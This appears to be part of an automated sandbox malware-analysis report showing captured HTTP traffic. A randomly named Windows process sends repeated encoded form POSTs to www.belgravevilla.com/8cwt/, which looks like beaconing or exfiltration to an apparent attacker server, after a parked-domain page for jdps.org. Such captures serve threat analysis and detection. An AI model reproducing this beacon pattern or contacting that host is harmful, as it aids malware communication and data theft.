                                      Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                      Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                      Jun 4, 2024 14:18:48.235214949 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                      Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                      Jun 4, 2024 14:18:48.235229015 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 6a 64 70 73 2e 6f 72 67 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 3e 54 68 69
                                      Data Ascii: <h1>jdps.org is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Registration"
                                      Jun 4, 2024 14:18:48.235243082 CEST1289INData Raw: 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38 31 38 2c 32 2e 39 32 37 37
                                      Data Ascii: 79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1.67249,0,
                                      Jun 4, 2024 14:18:48.235255003 CEST1289INData Raw: 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35 35 32 39 63 2d 31 31 2e 39
                                      Data Ascii: .83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.24184h-12.814
                                      Jun 4, 2024 14:18:48.235265970 CEST1289INData Raw: 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36 31 36 2c 31 2e 32 34 36 31
                                      Data Ascii: 2.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1.305,0,0,
                                      Jun 4, 2024 14:18:48.235276937 CEST1289INData Raw: 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31 32 2e 38 32 30 33 36 2c 32
                                      Data Ascii: 1,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352,1.25352,
                                      Jun 4, 2024 14:18:48.235290051 CEST1289INData Raw: 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e 39 37 37 37 32 63 2d 31 31
                                      Data Ascii: 52.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path><path d="
                                      Jun 4, 2024 14:18:48.235368967 CEST1289INData Raw: 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38 31 35 37 2c 32 31 2e 34 35
                                      Data Ascii: 63-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14.62777-17
                                      Jun 4, 2024 14:18:48.235451937 CEST1180INData Raw: 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36 32 2c 38 31 32 2e 33 31 34
                                      Data Ascii: 19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3.0065,10.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.11.304987792.205.8.26802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:53.603776932 CEST701OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.belgravevilla.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.belgravevilla.com
                                      Referer: http://www.belgravevilla.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 79 63 61 76 66 61 38 58 55 2b 69 7a 64 35 34 37 59 36 48 2b 77 76 77 59 6a 53 6c 44 53 6d 55 4c 37 51 69 41 72 70 31 5a 74 7a 57 4c 4e 52 2f 42 53 51 78 7a 76 49 49 39 6e 6c 72 65 37 77 4e 37 52 6e 69 52 77 38 6f 6a 6b 4c 38 48 66 39 64 52 45 43 66 63 75 4d 32 33 78 71 43 64 66 4e 64 76 72 46 51 67 76 34 59 66 65 76 79 66 33 63 78 72 35 4b 36 46 32 68 4d 74 72 42 57 4b 75 45 31 58 34 44 42 2b 31 45 4b 66 7a 72 77 6a 66 4f 48 30 4a 49 55 77 4b 4c 6b 75 57 2f 48 4b 78 37 33 77 73 70 4b 52 30 52 75 4c 6d 58 43 45 48 46 6d 70 6f 50 61 33 69 74 44 6f 70 73 77 42 67 69 4b 4c 68 51 3d 3d
                                      Data Ascii: 24eluX=ycavfa8XU+izd547Y6H+wvwYjSlDSmUL7QiArp1ZtzWLNR/BSQxzvII9nlre7wN7RniRw8ojkL8Hf9dRECfcuM23xqCdfNdvrFQgv4Yfevyf3cxr5K6F2hMtrBWKuE1X4DB+1EKfzrwjfOH0JIUwKLkuW/HKx73wspKR0RuLmXCEHFmpoPa3itDopswBgiKLhQ==
                                      Jun 4, 2024 14:18:53.879776955 CEST1289INHTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:53 GMT
                                      Server: Apache
                                      X-Powered-By: PHP/8.1.28
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Content-Length: 2508
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 59 7b 73 da b8 16 ff 3b 7c 0a d5 9d ad 61 8a 0d a4 24 a1 10 a7 3b 7d e5 ee 9d 6d bb b3 cd de d9 3b 9d 4e 47 d8 b2 51 22 4b ae 25 e3 d0 34 df fd 1e 49 b6 31 81 a4 d9 b6 73 21 10 bd 7c 74 5e 3a e7 77 c4 f1 83 97 ef 5e 9c fd f7 8f 57 68 a1 52 76 d2 39 d6 ff 50 c8 b0 94 81 23 33 cf 74 3b 7b 7b 7b d0 96 84 44 59 2e 22 a4 c7 bd b8 60 cc 41 0c f3 24 70 08 77 f4 a3 04 47 27 7a ad 7e 75 3a fa d3 39 7e e0 79 e8 5d 46 38 3a cd 71 b6 40 9e 07 0b 53 a2 30 02 4a 19 c9 d5 2a 70 44 32 2d 72 a0 15 0a ae 08 57 81 b3 50 2a 9b 0e 06 65 59 fa 73 c2 92 1c 2f c9 92 32 86 fd 50 a4 83 49 58 aa 81 83 06 3b e9 a8 55 46 5a 84 4a 32 97 54 11 b3 ba 62 cb 30 74 56 52 a5 48 8e 5e e0 3c 6a b1 c4 71 4a 02 47 d9 c9 69 08 93 2d 5a b2 48 53 9c af da b4 e0 63 1f 0c 17 38 97 04 16 fd 75 f6 da 9b 38 9b f4 96 94 94 99 c8 55 9b 2f 1a a9 45 10 81 54 21 f1 4c a7 8f 28 a7 8a 62 e6 c9 10 33 12 8c fc a1 26 a3 99 7d 49 62 5c 30 85 5e bc 7f 6f 79 65 94 5f a0 9c b0 c0 95 6a c5 88 5c 10 a2 5c 44 23 e8 57 16 f2 42 29 [TRUNCATED]
                                      Data Ascii: Y{s;|a$;}m;NGQ"K%4I1s!|t^:w^WhRv9P#3t;{{{DY."`A$pwG'z~u:9~y]F8:q@S0J*pD2-rWP*eYs/2PIX;UFZJ2Tb0tVRH^<jqJGi-ZHSc8u8U/ET!L(b3&}Ib\0^oye_j\\D#WB)Eh8p+nkAr9aOY1g4G>0lIci"j`MIDqb\1K"EJ~&-F`{$5oes*Dz;0b GygTQ431N)[Pb:=>"*3W,qOcfSpp>3P0O6kT#_`8$NSOn>upmYh&MA}oI)n$9gfiIhP'5OSZJO\'+~5E 3Y:`f@xHp(0"Iw}{[>WdLHp,?7WsldGKh<f=te<^+}l=h!p}krr9Do1/!*pEEv6I]wk+ng&uF?:?-d3gxP|]@3
                                      Jun 4, 2024 14:18:53.879888058 CEST1289INData Raw: 41 dd aa 72 d7 5e 35 85 64 1e 36 30 eb 7b 33 eb b9 1c 68 50 68 08 4a 93 53 cf a5 83 22 12 93 fc a4 d9 19 ed b5 12 67 e7 fe fb 53 1e b2 22 22 52 ef 72 fe b9 20 f9 aa fa 57 6f 74 d2 12 ae 9d 8d cf 70 82 de 60 0e f1 2f df 50 46 37 2e 78 a8 a8 e0 dd
                                      Data Ascii: Ar^5d60{3hPhJS"gS""Rr Wotp`/PF7.xei>gg\tDT8W!;t{~B^,A=S\("#)+-}~wa%0XnH>sPz;;\0PyAqk,E?S+QWb
                                      Jun 4, 2024 14:18:53.879898071 CEST275INData Raw: a0 12 26 c9 6c af 55 af eb 52 7d a0 cf b2 2e ed ab 41 b7 01 03 6e 10 04 06 4b 89 18 7d 52 79 fc 19 7d fd 8a aa 02 ce b7 03 01 fa f0 b1 37 bb fd 91 08 3d 7a b4 f1 48 14 c0 03 7d d3 aa 6b 60 15 86 cc 9f 43 19 f6 2f 21 a1 0e 76 41 31 10 6c 01 5d 43
                                      Data Ascii: &lUR}.AnK}Ry}7=zH}k`C/!vA1l]Cs33yr>0l<y:Otd7C!h#p\8\n:@*"8a.Z"G?`GqTB-LyP}y:CXEL#R?T1


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.11.304987892.205.8.26802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:56.360236883 CEST721OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.belgravevilla.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.belgravevilla.com
                                      Referer: http://www.belgravevilla.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 79 63 61 76 66 61 38 58 55 2b 69 7a 63 5a 49 37 58 37 48 2b 32 50 77 62 2f 69 6c 44 64 47 55 50 37 51 6d 41 72 73 4e 4a 74 46 47 4c 4e 7a 6e 42 52 52 78 7a 71 49 49 39 74 46 72 58 32 51 4e 38 52 6e 65 5a 77 2b 73 6a 6b 4b 63 48 66 39 4e 52 45 52 33 66 38 73 32 31 34 4b 43 66 52 74 64 76 72 46 51 67 76 34 4d 35 65 73 43 66 33 4d 42 72 35 72 37 54 2f 42 4d 75 37 52 57 4b 6b 55 31 54 34 44 42 51 31 42 75 31 7a 70 49 6a 66 50 33 30 49 63 49 7a 64 37 6b 6f 4c 76 48 65 31 4b 61 56 6a 71 6d 38 2f 7a 36 50 68 43 57 7a 50 79 58 7a 31 4d 75 31 78 4e 2f 46 31 74 64 70 69 67 4c 51 38 58 2f 4d 47 6d 63 6a 44 4c 6f 4e 2b 49 4c 4f 51 6c 7a 59 48 4f 67 3d
                                      Data Ascii: 24eluX=ycavfa8XU+izcZI7X7H+2Pwb/ilDdGUP7QmArsNJtFGLNznBRRxzqII9tFrX2QN8RneZw+sjkKcHf9NRER3f8s214KCfRtdvrFQgv4M5esCf3MBr5r7T/BMu7RWKkU1T4DBQ1Bu1zpIjfP30IcIzd7koLvHe1KaVjqm8/z6PhCWzPyXz1Mu1xN/F1tdpigLQ8X/MGmcjDLoN+ILOQlzYHOg=
                                      Jun 4, 2024 14:18:56.634248018 CEST1289INHTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:56 GMT
                                      Server: Apache
                                      X-Powered-By: PHP/8.1.28
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Content-Length: 2508
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 59 7b 73 da b8 16 ff 3b 7c 0a d5 9d ad 61 8a 0d a4 24 a1 10 a7 3b 7d e5 ee 9d 6d bb b3 cd de d9 3b 9d 4e 47 d8 b2 51 22 4b ae 25 e3 d0 34 df fd 1e 49 b6 31 81 a4 d9 b6 73 21 10 bd 7c 74 5e 3a e7 77 c4 f1 83 97 ef 5e 9c fd f7 8f 57 68 a1 52 76 d2 39 d6 ff 50 c8 b0 94 81 23 33 cf 74 3b 7b 7b 7b d0 96 84 44 59 2e 22 a4 c7 bd b8 60 cc 41 0c f3 24 70 08 77 f4 a3 04 47 27 7a ad 7e 75 3a fa d3 39 7e e0 79 e8 5d 46 38 3a cd 71 b6 40 9e 07 0b 53 a2 30 02 4a 19 c9 d5 2a 70 44 32 2d 72 a0 15 0a ae 08 57 81 b3 50 2a 9b 0e 06 65 59 fa 73 c2 92 1c 2f c9 92 32 86 fd 50 a4 83 49 58 aa 81 83 06 3b e9 a8 55 46 5a 84 4a 32 97 54 11 b3 ba 62 cb 30 74 56 52 a5 48 8e 5e e0 3c 6a b1 c4 71 4a 02 47 d9 c9 69 08 93 2d 5a b2 48 53 9c af da b4 e0 63 1f 0c 17 38 97 04 16 fd 75 f6 da 9b 38 9b f4 96 94 94 99 c8 55 9b 2f 1a a9 45 10 81 54 21 f1 4c a7 8f 28 a7 8a 62 e6 c9 10 33 12 8c fc a1 26 a3 99 7d 49 62 5c 30 85 5e bc 7f 6f 79 65 94 5f a0 9c b0 c0 95 6a c5 88 5c 10 a2 5c 44 23 e8 57 16 f2 42 29 [TRUNCATED]
                                      Data Ascii: Y{s;|a$;}m;NGQ"K%4I1s!|t^:w^WhRv9P#3t;{{{DY."`A$pwG'z~u:9~y]F8:q@S0J*pD2-rWP*eYs/2PIX;UFZJ2Tb0tVRH^<jqJGi-ZHSc8u8U/ET!L(b3&}Ib\0^oye_j\\D#WB)Eh8p+nkAr9aOY1g4G>0lIci"j`MIDqb\1K"EJ~&-F`{$5oes*Dz;0b GygTQ431N)[Pb:=>"*3W,qOcfSpp>3P0O6kT#_`8$NSOn>upmYh&MA}oI)n$9gfiIhP'5OSZJO\'+~5E 3Y:`f@xHp(0"Iw}{[>WdLHp,?7WsldGKh<f=te<^+}l=h!p}krr9Do1/!*pEEv6I]wk+ng&uF?:?-d3gxP|]@3
                                      Jun 4, 2024 14:18:56.634388924 CEST1289INData Raw: 41 dd aa 72 d7 5e 35 85 64 1e 36 30 eb 7b 33 eb b9 1c 68 50 68 08 4a 93 53 cf a5 83 22 12 93 fc a4 d9 19 ed b5 12 67 e7 fe fb 53 1e b2 22 22 52 ef 72 fe b9 20 f9 aa fa 57 6f 74 d2 12 ae 9d 8d cf 70 82 de 60 0e f1 2f df 50 46 37 2e 78 a8 a8 e0 dd
                                      Data Ascii: Ar^5d60{3hPhJS"gS""Rr Wotp`/PF7.xei>gg\tDT8W!;t{~B^,A=S\("#)+-}~wa%0XnH>sPz;;\0PyAqk,E?S+QWb
                                      Jun 4, 2024 14:18:56.634399891 CEST275INData Raw: a0 12 26 c9 6c af 55 af eb 52 7d a0 cf b2 2e ed ab 41 b7 01 03 6e 10 04 06 4b 89 18 7d 52 79 fc 19 7d fd 8a aa 02 ce b7 03 01 fa f0 b1 37 bb fd 91 08 3d 7a b4 f1 48 14 c0 03 7d d3 aa 6b 60 15 86 cc 9f 43 19 f6 2f 21 a1 0e 76 41 31 10 6c 01 5d 43
                                      Data Ascii: &lUR}.AnK}Ry}7=zH}k`C/!vA1l]Cs33yr>0l<y:Otd7C!h#p\8\n:@*"8a.Z"G?`GqTB-LyP}y:CXEL#R?T1


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.11.304987992.205.8.26802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:59.108072042 CEST1638OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.belgravevilla.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.belgravevilla.com
                                      Referer: http://www.belgravevilla.com/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 1139
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 79 63 61 76 66 61 38 58 55 2b 69 7a 63 5a 49 37 58 37 48 2b 32 50 77 62 2f 69 6c 44 64 47 55 50 37 51 6d 41 72 73 4e 4a 74 46 4f 4c 4e 41 76 42 53 79 4a 7a 70 49 49 39 68 6c 72 53 32 51 4d 67 52 6e 47 64 77 2b 78 59 6b 4f 73 48 66 66 31 52 55 77 33 66 6c 63 32 31 36 4b 43 61 66 4e 64 36 72 46 41 65 76 34 63 35 65 73 43 66 33 4f 4a 72 2b 36 37 54 35 42 4d 74 72 42 57 4f 75 45 30 4f 34 44 5a 6d 31 41 75 50 79 5a 6f 6a 52 50 6e 30 45 50 67 7a 42 72 6b 71 59 66 47 5a 31 4b 57 47 6a 71 36 77 2f 79 65 70 68 46 79 7a 4d 54 54 76 6d 64 44 72 71 76 72 49 33 2b 35 4e 6c 41 4c 5a 39 6d 4c 38 42 46 59 4a 4c 71 63 41 33 59 37 4d 4c 51 72 63 52 61 4b 49 49 76 56 6b 4f 53 75 79 44 69 6e 75 48 73 37 63 32 4d 4d 74 34 66 57 70 4e 4b 72 42 53 66 76 4a 6c 4d 72 58 34 41 30 73 37 49 38 4f 43 6c 48 75 61 41 56 37 6b 31 69 57 44 70 78 5a 74 5a 51 6b 69 6e 35 54 52 75 79 30 72 73 70 4d 63 4b 4f 6a 72 39 6c 75 59 44 69 4e 51 68 67 42 68 6b 48 4e 76 30 48 6b 38 74 4c 69 65 37 30 65 64 6f 54 2f 39 34 63 [TRUNCATED]
                                      Data Ascii: 24eluX=ycavfa8XU+izcZI7X7H+2Pwb/ilDdGUP7QmArsNJtFOLNAvBSyJzpII9hlrS2QMgRnGdw+xYkOsHff1RUw3flc216KCafNd6rFAev4c5esCf3OJr+67T5BMtrBWOuE0O4DZm1AuPyZojRPn0EPgzBrkqYfGZ1KWGjq6w/yephFyzMTTvmdDrqvrI3+5NlALZ9mL8BFYJLqcA3Y7MLQrcRaKIIvVkOSuyDinuHs7c2MMt4fWpNKrBSfvJlMrX4A0s7I8OClHuaAV7k1iWDpxZtZQkin5TRuy0rspMcKOjr9luYDiNQhgBhkHNv0Hk8tLie70edoT/94c73qphpUh96lxihbjuswNb4DyLke88hIpc7f4IE/TyYg8KjHRirNF9yXyD/lMDziOK4X0Wq3M5TOp9dhrAo6cwXCaPx4r2x9mzEafVx/Jq8a4OFf9KTuLNnaA//oBfd+vXnsBx5v31igKD+QaPqklVJ8EbtkYG52jWNOezqic1zASMuBlKqm77iTY7n+Qmz7xKOkrPM0n+Qw8AApwmUUTBOBKLHOLOYWTKmzxfvDiUKe+QGGAgC+RUh/FKtY+Ob96aBZAamMEzxwp+jVzR9UuZHE7Q2usvpV2WJwM29UpJNscv3POwmEGfkT0HdbOzp+uck6xgaCCO/nrwLpU9nZ734JPbJLO/hhXZ+0CCSO7+GZoCOz6/5hTvQEwV+1ixnnLjS+1wzU9EyKM1EGHd/1rmJtEhk/PVApM+IDckfGkRllAe58Oqo14D5Z+j1Z9XPBCqK3/0+m3ImAFdEoEVRX6XIM4j3sIIo+wM5amtPlq4WJtg7VNuoRPvZpuYla5059RhAlcguo8mJf7zQe+2YPSbLb5pBbICKlJn0i13K4T+YoFPE/MLD1KZbS4iHioYYecqFtTRV4MVIZKfsb0+1fAFaG/xMMy4oF36Fy+0Lz2M35ryPgoHhPIf7uxOn9n6j0D/PmuUxRdd0gKj+7TMDf9xmpBlPn/788P7h [TRUNCATED]
                                      Jun 4, 2024 14:18:59.382074118 CEST1289INHTTP/1.1 200 OK
                                      Date: Tue, 04 Jun 2024 12:18:59 GMT
                                      Server: Apache
                                      X-Powered-By: PHP/8.1.28
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Upgrade: h2,h2c
                                      Connection: Upgrade, close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Content-Length: 2508
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 1f 8b 08 00 00 00 00 00 00 03 bd 59 7b 73 da b8 16 ff 3b 7c 0a d5 9d ad 61 8a 0d a4 24 a1 10 a7 3b 7d e5 ee 9d 6d bb b3 cd de d9 3b 9d 4e 47 d8 b2 51 22 4b ae 25 e3 d0 34 df fd 1e 49 b6 31 81 a4 d9 b6 73 21 10 bd 7c 74 5e 3a e7 77 c4 f1 83 97 ef 5e 9c fd f7 8f 57 68 a1 52 76 d2 39 d6 ff 50 c8 b0 94 81 23 33 cf 74 3b 7b 7b 7b d0 96 84 44 59 2e 22 a4 c7 bd b8 60 cc 41 0c f3 24 70 08 77 f4 a3 04 47 27 7a ad 7e 75 3a fa d3 39 7e e0 79 e8 5d 46 38 3a cd 71 b6 40 9e 07 0b 53 a2 30 02 4a 19 c9 d5 2a 70 44 32 2d 72 a0 15 0a ae 08 57 81 b3 50 2a 9b 0e 06 65 59 fa 73 c2 92 1c 2f c9 92 32 86 fd 50 a4 83 49 58 aa 81 83 06 3b e9 a8 55 46 5a 84 4a 32 97 54 11 b3 ba 62 cb 30 74 56 52 a5 48 8e 5e e0 3c 6a b1 c4 71 4a 02 47 d9 c9 69 08 93 2d 5a b2 48 53 9c af da b4 e0 63 1f 0c 17 38 97 04 16 fd 75 f6 da 9b 38 9b f4 96 94 94 99 c8 55 9b 2f 1a a9 45 10 81 54 21 f1 4c a7 8f 28 a7 8a 62 e6 c9 10 33 12 8c fc a1 26 a3 99 7d 49 62 5c 30 85 5e bc 7f 6f 79 65 94 5f a0 9c b0 c0 95 6a c5 88 5c 10 a2 5c 44 23 e8 57 16 f2 42 29 [TRUNCATED]
                                      Data Ascii: Y{s;|a$;}m;NGQ"K%4I1s!|t^:w^WhRv9P#3t;{{{DY."`A$pwG'z~u:9~y]F8:q@S0J*pD2-rWP*eYs/2PIX;UFZJ2Tb0tVRH^<jqJGi-ZHSc8u8U/ET!L(b3&}Ib\0^oye_j\\D#WB)Eh8p+nkAr9aOY1g4G>0lIci"j`MIDqb\1K"EJ~&-F`{$5oes*Dz;0b GygTQ431N)[Pb:=>"*3W,qOcfSpp>3P0O6kT#_`8$NSOn>upmYh&MA}oI)n$9gfiIhP'5OSZJO\'+~5E 3Y:`f@xHp(0"Iw}{[>WdLHp,?7WsldGKh<f=te<^+}l=h!p}krr9Do1/!*pEEv6I]wk+ng&uF?:?-d3gxP|]@3
                                      Jun 4, 2024 14:18:59.382194042 CEST1289INData Raw: 41 dd aa 72 d7 5e 35 85 64 1e 36 30 eb 7b 33 eb b9 1c 68 50 68 08 4a 93 53 cf a5 83 22 12 93 fc a4 d9 19 ed b5 12 67 e7 fe fb 53 1e b2 22 22 52 ef 72 fe b9 20 f9 aa fa 57 6f 74 d2 12 ae 9d 8d cf 70 82 de 60 0e f1 2f df 50 46 37 2e 78 a8 a8 e0 dd
                                      Data Ascii: Ar^5d60{3hPhJS"gS""Rr Wotp`/PF7.xei>gg\tDT8W!;t{~B^,A=S\("#)+-}~wa%0XnH>sPz;;\0PyAqk,E?S+QWb
